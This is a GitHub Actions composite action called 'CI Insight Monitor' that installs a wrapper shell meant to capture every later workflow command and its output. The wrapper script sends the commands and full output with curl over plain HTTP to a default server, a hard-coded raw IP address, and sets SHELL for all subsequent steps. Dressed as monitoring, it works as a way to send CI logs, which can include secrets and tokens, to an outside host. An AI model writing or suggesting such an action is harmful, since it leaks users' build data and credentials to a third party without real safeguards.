name: "CI Insight Monitor"
description: "Real-time monitoring for GitHub Actions"
inputs:
  server-url:
    description: "Monitoring server URL"
    default: "http://129.154.46.198:3000"
    required: false
runs:
  using: "composite"
  steps:
    - name: Setup Real-time Monitoring
      shell: bash
      run: |
        # Create the custom shell that captures everything
        CUSTOM_SHELL="/tmp/ci-insight-shell-${GITHUB_RUN_ID}.sh"

        cat > "$CUSTOM_SHELL" << 'EOF'
        #!/bin/bash
        # Custom shell for real-time monitoring

        RUN_ID="${{ github.run_id }}"
        REPO="${{ github.repository }}"
        SERVER_URL="${{ inputs.server-url }}"
        STEP_ID="${GITHUB_STEP_ID:-$(date +%s)}"

        # The actual command to execute
        COMMAND="$*"

        # Create temp file for output
        TEMP_LOG="/tmp/ci-step-${STEP_ID}.log"

        # Execute command and capture everything
        {
            echo "=== CI-Insight Monitoring ==="
            echo "Run ID: $RUN_ID"
            echo "Repository: $REPO"
            echo "Step ID: $STEP_ID"
            echo "Command: $COMMAND"
            echo "Timestamp: $(date -u +"%Y-%m-%dT%H:%M:%SZ")"
            echo "============================="
            echo ""
            
            # Execute the actual command
            "$@"
            
            EXIT_CODE=$?
            echo ""
            echo "============================="
            echo "Exit Code: $EXIT_CODE"
            echo "End Time: $(date -u +"%Y-%m-%dT%H:%M:%SZ")"
        } 2>&1 | tee "$TEMP_LOG"

        # Capture exit code from the command (not tee)
        EXIT_CODE=${PIPESTATUS[0]}

        # Send logs to monitoring server
        if [ -s "$TEMP_LOG" ]; then
            OUTPUT=$(cat "$TEMP_LOG")
            
            # Send to server (non-blocking)
            curl -s -X POST "${SERVER_URL}/log" \
                -H "Content-Type: application/json" \
                -d "$(jq -n \
                    --arg run_id "$RUN_ID" \
                    --arg step_id "$STEP_ID" \
                    --arg command "$COMMAND" \
                    --arg output "$OUTPUT" \
                    --argjson exit_code "$EXIT_CODE" \
                    --arg timestamp "$(date -u +"%Y-%m-%dT%H:%M:%SZ")" \
                    '{
                        run_id: $run_id,
                        step_id: $step_id,
                        command: $command,
                        output: $output,
                        exit_code: $exit_code,
                        timestamp: $timestamp
                    }')" > /dev/null 2>&1 &
        fi

        # Clean up
        rm -f "$TEMP_LOG"

        exit $EXIT_CODE
        EOF

        # Make it executable
        chmod +x "$CUSTOM_SHELL"

        # Notify server we're starting monitoring
        curl -s -X POST "${{ inputs.server-url }}/start" \
            -H "Content-Type: application/json" \
            -d "$(jq -n \
                --arg run_id "${{ github.run_id }}" \
                --arg repo "${{ github.repository }}" \
                '{
                    run_id: $run_id,
                    repository: $repo,
                    api_key: "demo"
                }')"

        # Set this shell for all subsequent steps
        echo "SHELL=$CUSTOM_SHELL" >> $GITHUB_ENV

        echo "✅ Real-time monitoring enabled"
        echo "   All subsequent commands will be captured"
        echo "   View logs at: ${{ inputs.server-url }}/status/${{ github.run_id }}"
